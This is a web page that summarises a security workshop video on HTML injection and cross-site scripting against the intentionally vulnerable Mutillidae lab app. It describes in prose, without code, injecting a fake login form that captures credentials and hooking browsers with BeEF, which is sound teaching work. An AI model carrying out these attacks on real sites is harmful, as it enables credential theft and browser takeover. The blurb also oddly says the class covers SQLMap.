A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Search Irongeek.com:

Affiliates:
ISDPodcast Button
RootSecure Button
Social-engineer-training Button
Irongeek Button

Web Hosting:
Dreamhost Logo
Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle


Introduction to HTML Injection (HTMLi) and Cross Site Scripting (XSS) Using Mutillidae - ISSA Kentuckiana workshop 9  (Hacking Illustrated Series InfoSec Tutorial Videos)

Introduction to HTML Injection (HTMLi) and Cross Site Scripting (XSS) Using Mutillidae - ISSA Kentuckiana workshop 9 - Jeremy Druin

    This is part of the 9th in a line of classes Jeremy Druin will be giving on pen-testing and web app security featuring Mutillidae (or other tools) for the Kentuckiana ISSA. This one covers SQLMap.

Details:

Video Tutorials: www.youtube.com/user/webpwnized
Video Index URL: http://www.irongeek.com/i.php?page=videos/web-application-pen-testing-tutorials-with-mutillidae 
YouTube Channel:  http://www.youtube.com/user/webpwnized
Twitter Updates: @webpwnized
Title: Introduction to HTML Injection (HTMLi) and Cross Site Scripting (XSS) Using Mutillidae

This video covers the basics of injecting HTML into sites with vulnerabilities in which injected code is placed inline with intended code and executes in the users browser. The injected HTML in this video is a fake login box that posts the user username and password to a capture data page (in the NOWASP Mutillidae application).

Later the same vulnerability is used to inject cross site scripting attack that hooks the users browser with a Beef Framework script (hook.js) given an attacker control of the users browser.

 

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2014, IronGeek
Louisville / Kentuckiana Information Security Enthusiast